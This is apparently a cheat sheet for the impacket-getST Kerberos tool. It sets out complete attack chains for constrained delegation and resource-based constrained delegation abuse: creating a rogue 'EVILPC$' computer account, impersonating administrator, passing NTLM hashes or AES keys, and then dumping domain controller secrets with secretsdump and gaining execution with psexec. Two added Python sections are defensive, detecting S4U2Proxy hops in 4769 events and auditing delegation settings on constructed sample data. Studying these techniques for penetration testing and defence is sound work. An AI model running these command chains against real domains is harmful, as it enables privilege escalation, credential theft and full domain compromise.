Overview

impacket-getST requests a Service Ticket (TGS) from the KDC. It supports S4U2Self and S4U2Proxy extensions, making it the primary tool for abusing constrained delegation and resource-based constrained delegation (RBCD).
impacket-getST <DOMAIN>/<USER> -spn <SERVICE/HOST> [options]

Basic Usage

With Password

impacket-getST domain.local/jdoe:'Password123' -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

With NTLM Hash

impacket-getST domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

With Kerberos (existing TGT)

export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-getST domain.local/jdoe -k -no-pass -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

S4U2Self

Request a service ticket on behalf of another user to the requesting account’s own SPN. This produces a forwardable ticket if the account is trusted for delegation.
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1
This performs S4U2Self (get ticket as administrator to svc_sql) then S4U2Proxy (exchange it for a ticket to cifs/dc01.domain.local).

S4U2Proxy (Constrained Delegation)

When an account has msDS-AllowedToDelegateTo set, you can request a service ticket to the allowed SPN while impersonating any user.
# svc_sql is allowed to delegate to cifs/dc01.domain.local
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

With NTLM Hash

impacket-getST domain.local/svc_sql \
  -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

With AES Key

impacket-getST domain.local/svc_sql \
  -aesKey 3c4a5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

Full Constrained Delegation Attack Chain

# 1. Identify accounts with constrained delegation
impacket-findDelegation domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

# 2. Request service ticket impersonating admin
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

# 3. Use the ticket
export KRB5CCNAME=$(pwd)/administrator@cifs_dc01.domain.local@DOMAIN.LOCAL.ccache
impacket-secretsdump domain.local/administrator@dc01.domain.local -k -no-pass

Resource-Based Constrained Delegation (RBCD)

RBCD abuses msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer account.

Prerequisites

  • Control over a computer account (or ability to create one via addcomputer.py)
  • Write access to the target’s msDS-AllowedToActOnBehalfOfOtherIdentity

Full Attack Chain

# 1. Create a computer account (if needed)
impacket-addcomputer domain.local/jdoe:'Password123' \
  -computer-name 'EVILPC$' \
  -computer-pass 'Passw0rd!' \
  -dc-ip 10.10.10.1

# 2. Set RBCD — add EVILPC$ to target's msDS-AllowedToActOnBehalfOfOtherIdentity
# (using rbcd.py, ntlmrelayx, or ldap_shell)
python3 rbcd.py domain.local/jdoe:'Password123' -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -dc-ip 10.10.10.1 -action write

# 3. Request service ticket via S4U2Self + S4U2Proxy
impacket-getST domain.local/'EVILPC$':'Passw0rd!' \
  -impersonate administrator \
  -spn cifs/target.domain.local \
  -dc-ip 10.10.10.1

# 4. Use the ticket
export KRB5CCNAME=$(pwd)/administrator@cifs_target.domain.local@DOMAIN.LOCAL.ccache
impacket-secretsdump domain.local/administrator@target.domain.local -k -no-pass
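Added detection example for the defender side of both chains above (constrained delegation and RBCD); it is not part of impacket or of this cheat sheet. Windows records TGS requests as Event ID 4769, and a request made through S4U2Proxy carries the delegating service in the Transited Services field; the records below are constructed in a simplified key=value form, and the expected-path allowlist is an assumption.

```python
# Added example (not impacket code): flag S4U2Proxy delegation hops in 4769 events
# and compare them against the delegation paths the environment is known to use.
import re

# Constructed sample records, simplified to one key=value line per 4769 event.
# "-" in TransmittedServices means no delegation was involved in the request.
SAMPLE_4769 = """
EventID=4769 TargetUserName=jdoe@DOMAIN.LOCAL ServiceName=DC01$ IpAddress=10.10.10.50 TransmittedServices=-
EventID=4769 TargetUserName=administrator@DOMAIN.LOCAL ServiceName=DC01$ IpAddress=10.10.10.50 TransmittedServices=svc_sql@DOMAIN.LOCAL
EventID=4769 TargetUserName=administrator@DOMAIN.LOCAL ServiceName=TARGET$ IpAddress=10.10.10.50 TransmittedServices=EVILPC$@DOMAIN.LOCAL
EventID=4769 TargetUserName=websvc@DOMAIN.LOCAL ServiceName=SQL01$ IpAddress=10.10.10.60 TransmittedServices=iis_app@DOMAIN.LOCAL
""".strip().splitlines()

# Assumed allowlist: (delegating account, target service account) pairs that are legitimate.
EXPECTED_DELEGATION = {("iis_app@DOMAIN.LOCAL", "SQL01$")}

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Split one constructed key=value record into a dict."""
    return dict(FIELD_RE.findall(line))


def s4u2proxy_hops(lines):
    """One finding per 4769 whose Transited Services is populated, i.e. a delegation hop."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4769":
            continue
        transited = ev.get("TransmittedServices", "-")
        if transited in ("-", ""):
            continue
        findings.append({
            "impersonated": ev["TargetUserName"],   # the user the service acted as
            "via": transited,                       # the delegating service account
            "target_service": ev["ServiceName"],    # service the ticket was issued for
            "client_ip": ev.get("IpAddress"),
            "expected": (transited, ev["ServiceName"]) in EXPECTED_DELEGATION,
        })
    return findings


def unexpected_hops(lines):
    """Delegation hops that are not on the allowlist; these are the alerts."""
    return [f for f in s4u2proxy_hops(lines) if not f["expected"]]


if __name__ == "__main__":
    for f in unexpected_hops(SAMPLE_4769):
        print(f"ALERT: {f['via']} obtained a ticket as {f['impersonated']} "
              f"to {f['target_service']} from {f['client_ip']}")
```

A newly created computer account appearing in Transited Services, or a privileged principal being impersonated toward a domain controller, is what the unexpected-hop list surfaces.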

The -impersonate Flag

Specifies the user to impersonate via S4U2Self/S4U2Proxy. The impersonated user must not be a member of the Protected Users group or have the "Account is sensitive and cannot be delegated" flag set.
# Impersonate domain admin
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate administrator \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1

# Impersonate specific user
impacket-getST domain.local/svc_sql:'SvcPass123' \
  -impersonate da_user \
  -spn cifs/dc01.domain.local \
  -dc-ip 10.10.10.1
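Added audit example from the defender's side of the delegation and -impersonate sections above; it is not impacket code or part of this page. It decodes the userAccountControl bits that govern delegation, reads the two delegation attributes the page names, and reports which accounts are shielded from S4U impersonation. The objects are constructed sample data standing in for an LDAP export, and the Protected Users DN is assumed.

```python
# Added example (not impacket code): audit AD objects for delegation exposure and
# S4U impersonation protections. Flag values are the documented userAccountControl bits.
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition: S4U2Self yields forwardable tickets

PROTECTED_USERS_DN = "CN=Protected Users,CN=Users,DC=domain,DC=local"  # assumed DN

SAMPLE_OBJECTS = [  # constructed sample data, not a real export
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x1000200,
     "msDS-AllowedToDelegateTo": ["cifs/dc01.domain.local"], "memberOf": []},
    {"sAMAccountName": "TARGET$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80",  # truncated placeholder SD
     "memberOf": []},
    {"sAMAccountName": "administrator", "userAccountControl": 0x200, "memberOf": []},
    {"sAMAccountName": "da_user", "userAccountControl": 0x100200, "memberOf": [PROTECTED_USERS_DN]},
]


def delegation_findings(obj):
    """Describe every way this object can delegate (unconstrained, constrained, RBCD)."""
    uac = obj["userAccountControl"]
    findings = []
    if uac & UF_TRUSTED_FOR_DELEGATION:
        findings.append("unconstrained delegation")
    if obj.get("msDS-AllowedToDelegateTo"):
        kind = "constrained delegation"
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            kind += " with protocol transition (S4U2Self forwardable)"
        findings.append(kind + " to " + ", ".join(obj["msDS-AllowedToDelegateTo"]))
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("RBCD configured (msDS-AllowedToActOnBehalfOfOtherIdentity set)")
    return findings


def impersonation_protected(obj):
    """True when S4U impersonation of this account is blocked by NOT_DELEGATED or Protected Users."""
    sensitive = bool(obj["userAccountControl"] & UF_NOT_DELEGATED)
    return sensitive or PROTECTED_USERS_DN in obj.get("memberOf", [])


def audit(objects):
    """Map each account to its delegation findings and impersonation protection status."""
    return {obj["sAMAccountName"]: {"delegation": delegation_findings(obj),
                                    "protected_from_impersonation": impersonation_protected(obj)}
            for obj in objects}


if __name__ == "__main__":
    for name, result in audit(SAMPLE_OBJECTS).items():
        print(name, result)
```

Privileged accounts that show delegation findings but no protection are the ones the -impersonate flag can target; moving them into Protected Users or setting the sensitive flag closes that path.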

The -spn Flag

Specifies the target Service Principal Name. Common SPNs:
SPN          Use Case
cifs/host    SMB access (psexec, smbclient, secretsdump)
http/host    Web services, WinRM
mssql/host   SQL Server access
ldap/host    LDAP operations
host/host    Generic host service

# SMB access
impacket-getST domain.local/svc$:'Pass' -impersonate admin -spn cifs/dc01.domain.local

# MSSQL access
impacket-getST domain.local/svc$:'Pass' -impersonate admin -spn mssql/sql01.domain.local

Using the Resulting Ticket

The output .ccache file is named based on the impersonated user and target SPN:
# Set the ticket
export KRB5CCNAME=$(pwd)/administrator@cifs_dc01.domain.local@DOMAIN.LOCAL.ccache

# Verify
klist

# Use with impacket tools
impacket-psexec domain.local/administrator@dc01.domain.local -k -no-pass
impacket-secretsdump domain.local/administrator@dc01.domain.local -k -no-pass
impacket-smbclient domain.local/administrator@dc01.domain.local -k -no-pass

Quick Reference

# Basic service ticket
impacket-getST domain.local/jdoe:'Pass' -spn cifs/target.domain.local -dc-ip 10.10.10.1

# Constrained delegation abuse
impacket-getST domain.local/svc:'Pass' -impersonate administrator -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

# RBCD with computer account
impacket-getST domain.local/'EVIL$':'Pass' -impersonate administrator -spn cifs/target.domain.local -dc-ip 10.10.10.1

# With hash
impacket-getST domain.local/svc -hashes :NTHASH -impersonate administrator -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

# With AES key
impacket-getST domain.local/svc -aesKey KEY -impersonate administrator -spn cifs/dc01.domain.local -dc-ip 10.10.10.1

Flag                         Description
-spn SPN                     Target Service Principal Name
-impersonate USER            User to impersonate via S4U
-hashes LMHASH:NTHASH        Authenticate with NTLM hash
-aesKey KEY                  Authenticate with AES key
-dc-ip IP                    Domain controller IP address
-k                           Use Kerberos authentication
-no-pass                     Don't ask for password
-additional-ticket TICKET    Additional ticket for S4U2Proxy
-force-forwardable           Force the ticket to be forwardable